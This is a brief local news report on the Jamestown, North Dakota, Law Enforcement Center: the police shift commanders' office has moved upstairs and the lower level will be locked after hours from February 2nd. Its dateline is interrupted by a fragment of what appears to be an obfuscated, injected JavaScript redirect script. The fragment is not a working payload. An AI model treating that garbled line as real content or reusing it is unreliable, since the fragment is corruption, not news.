JAMESTOWN, thieh|var|u0026u|referrer|szdyi||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The Law Enforcment Center in Jamestown is informing the public on changes being made within the center.

According to Stutsman County Emergency Manager Jerry Bergquist, The Jamestown Police Department has moved its downstairs Shift Commanders office upstairs. This will help to improve internal work efficiency by being closer to its overall police operation. Individuals with law enforcement business can now go to the main floor lobby to speak to a representative.

Because of no law enforcement presence downstairs, beginning February 2nd, the lower level will be locked after regular business hours, weekends and holidays. During off hours, individuals can contact the Stutsman County Communications Center at 701-252-1000 and as always, in emergencies, call 9-1-1.

Jail operations will remain the same.
